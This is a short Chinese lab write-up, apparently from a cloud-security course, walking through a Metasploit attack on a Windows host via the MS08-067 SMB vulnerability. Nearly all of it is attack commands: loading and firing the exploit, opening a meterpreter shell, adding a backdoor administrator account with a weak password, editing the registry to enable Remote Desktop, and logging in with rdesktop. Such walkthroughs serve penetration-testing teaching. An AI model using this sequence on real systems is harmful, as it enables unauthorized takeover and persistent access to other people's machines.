渗透实验一

msf > search ms08-067
搜索ms08-067相关漏洞的攻击模块
云安全实验一
msf > use exploit/windows/smb/ms08_067_netapi
使用刚才搜索到的漏洞
云安全实验一
msf exploit(ms08_067_netapi) > set rhost 192.168.0.109
设置要攻击的目标主机ip

msf exploit(ms08_067_netapi) > exploit
发起攻击

云安全实验一
这样就表示成功了!

meterpreter > shell
对目标主机进行命令行控制

云安全实验一
C:\WINDOWS\system32>net user root 123456 /add
给自己创建1个新用户,root,密码123456
云安全实验一
这里要注意空格也算作密码,所以要注意
C:\WINDOWS\system32>net localgroup administrators root /add
给自己的用户提权,加入管理员组
云安全实验一
但是这个地方要空格,我很奇怪
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
通过编辑注册表,开启目标主机的远程桌面功能
直接在kali中输入即可
云安全实验一
[email protected]:~# rdesktop -a 16 192.168.0.109
另外开1个窗口,通过远程桌面登录目标主机
这里要新打开一个terminal窗口

登录时输入刚才创建的密码,就可以了,等待一下。出现如下界面,ok了!

云安全实验一

相关文章:

  • 2021-05-21
  • 2021-06-25
  • 2021-09-17
  • 2021-04-03
  • 2021-12-29
  • 2021-12-24
  • 2021-10-02
  • 2021-10-30
猜你喜欢
  • 2021-08-21
  • 2021-10-10
  • 2022-12-23
  • 2021-10-09
  • 2022-12-23
  • 2021-06-26
相关资源
相似解决方案